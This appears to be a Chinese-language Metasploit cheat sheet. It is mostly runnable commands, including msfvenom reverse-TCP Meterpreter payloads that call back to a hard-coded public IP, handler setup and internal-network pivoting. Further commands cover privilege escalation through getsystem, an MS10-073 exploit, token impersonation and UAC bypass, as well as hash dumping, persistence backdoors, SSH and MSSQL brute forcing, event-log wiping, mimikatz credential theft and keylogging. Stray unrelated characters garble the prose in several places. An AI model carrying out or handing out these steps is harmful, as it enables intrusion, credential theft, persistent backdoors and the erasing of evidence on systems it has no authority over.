MSF的一些常規(guī)操作
一、 Payload 的幾種常用生成
1.1 生成windows下的反彈木馬
msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe # -p <payload> -f <format> -o <path> = >
1.2 監(jiān)聽
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp # 阿里云云服務(wù)器這里是內(nèi)網(wǎng)ip set LHOST 172.17.150.246 set LPORT 8888 exploit -j
1.3 php
msfvenom -p php/meterpreter_reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f raw > shell.php use exploit/multi/handler set PAYLOAD php/meterpreter_reverse_tcp set LHOST 172.17.150.246 set LPORT 8888 exploit -j
1.4 shellcode
# -e 使用編碼 -i 編碼次數(shù) msfvenom -p windows/meterpreter/reverse_tcp LPORT=1234 LHOST=60.205.212.140 -e x86/shikata_ga_nai -i 11 -f py > 1.py
二巾遭、內(nèi)網(wǎng)代理
2.1 首先需要鏈接 sessions ,在此基礎(chǔ)上添加路由
meterpreter > run get_local_subnets //獲取網(wǎng)段 meterpreter > run autoroute -s 172.2.175.0/24 //添加路由 meterpreter > run autoroute -p //查看路由 meterpreter > run autoroute -d -s 172.2.175.0 //刪除網(wǎng)段 meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 //探測該網(wǎng)段下的存活主機(jī)鞠评。 meterpreter > background //后臺sessions
三夏块、提權(quán)
3.1 getsystem
meterpreter > getsystem //直getsystem提權(quán)北专,最常用簡單的辦法
3.2 使用 exp 提權(quán)
meterpreter > background //先后臺運行會話 [*] Backgrounding session 1… msf > use post/windows/escalate/ms10_073_kbdlayout msf > show options msf > set session 1 //設(shè)置要使用的會話 msf post(ms10_073_kbdlayout) > exploit 注意:如果創(chuàng)建了一個system進(jìn)程,就可以立馬sessions 1進(jìn)入會話闭专,然后ps查看進(jìn)程奴潘,使用migrate pid注入到進(jìn)程旧烧。 或者直接: meterpreter > run post/windows/escalate/ms10_073_kbdlayout
3.3 盜取令牌
meterpreter > use incognito //進(jìn)入這個模塊 meterpreter > list_tokens –u //查看存在的令牌 meterpreter > impersonate_token NT AUTXXXX\SYSTEM //令牌是DelegationTokens一列,getuid查看画髓,兩個斜杠 [注]:只有具有"模仿安全令牌權(quán)限"的賬戶才能去模仿別人的令牌掘剪,一般大多數(shù)的服務(wù)型賬戶(IIS、MSSQL等)有這個權(quán)限奈虾,大多數(shù)用戶級的賬戶沒有這個權(quán)限夺谁。一般從web拿到的webshell都是IIS服務(wù)器權(quán)限,是具有這個模仿權(quán)限的肉微,建好的賬戶沒有這個權(quán)限匾鸥。使用菜刀(IIS服務(wù)器權(quán)限)反彈meterpreter是服務(wù)型權(quán)限。
3.4 Bypassuac
msf > use exploit/windows/local/bypassuac //32位與64位一樣碉纳,其他幾個模塊也一樣 msf > show options msf > set session 4 msf > run //成功后會返回一個新的session勿负,進(jìn)入新會話,發(fā)現(xiàn)權(quán)限沒變劳曹,使用getsystem即可完成提權(quán)
3.5 Hash
meterpreter > run post/windows/gather/smart_hashdump //讀取hash這種做法最智能奴愉,效果最好。
四铁孵、建立持久后門
4.1 服務(wù)啟動后門
meterpreter > run metsvc -A //再開起一個終端锭硼,進(jìn)入msfconsole msf > use exploit/multi/handler //新終端中監(jiān)聽 msf > set payload windows/metsvc_bind_tcp msf > set LPORT 31337 msf > set RHOST 192.168.0.128 msf > run //獲取到的會話是system權(quán)限
4.2 啟動項后門
meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105 # -X 系統(tǒng)開機(jī)自啟,-i 10 10秒重連一次蜕劝,-p 監(jiān)聽端口檀头,-r 監(jiān)聽機(jī)。直接監(jiān)聽就好了岖沛,他自己會鏈接回來暑始。 [注意]:移除 persistence 后門的辦法是刪除 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ 中的注冊表鍵和 C:\WINDOWS\TEMP\ 中的 VBScript 文件。 [缺點]:容易被殺毒軟件殺 烫止。
這兩個后門有個弊端蒋荚,在進(jìn)程中都會存在服務(wù)名稱為meterpreter的進(jìn)程。
五馆蠕、漏洞掃描
5.1 對端口掃描
use auxiliary/scanner/portscan/tcp show options set rhosts 192.168.2.1-255 set ports 21,22,25,443,445,1433,3306 set threads 20 exploit
5.2 mssql開發(fā)利用
# 1.對各個ip是否有mssql服務(wù)的探測 use scanner/mssql/mssql_ping //測試MSSQL的存在和信息 show options set rhosts 192.168.2.1-255 set threads 30 exploit # 2.對掃描到的ip進(jìn)行爆破 use scanner/mssql/mssql_login //具體配置show options。 # 3.sa權(quán)限對其利用 use admin/mssql/mssql_exec set rhost 192.168.2.10 set password sa set CMD cmd.exe /c echo hello exploit
5.3 mysql開放利用
5.4 爆破ssh模塊
use auxiliary/scanner/ssh/ssh_login set rhosts 7.7.7.20 set username root set pass_file /root/pass.txt //加載字典惊奇,可以收集密碼做字典 set threads 50 run
5.5 通過 nmap 掃描基本漏洞
msf > nmap –script=vuln 受害靶機(jī)ip地址 msf > nmap –script=mysql-info 192.168.0.4 //掃描mysql數(shù)據(jù)庫信息 版本 等..
六互躬、清除記錄
msf > clearev //刪除目標(biāo)機(jī)上的應(yīng)用程序、系統(tǒng)和安全日志颂郎。
七吼渡、一些常用命令
# 查看系統(tǒng)命令 sysinfo # 截圖 screenshot # 查看是否是虛擬機(jī) run checkvm # 查看運行木馬的用戶 getuid # 注入到進(jìn)程 成功會提示successfully migrate pid # 加載mimikatz模塊 meterpreter > load mimikatz ## 需要system權(quán)限 meterpreter > wdigest # 獲取鍵盤記錄 meterpreter> run post/windows/capture/keylog_recorder #運行鍵盤記錄模塊,他自己創(chuàng)建本文乓序。
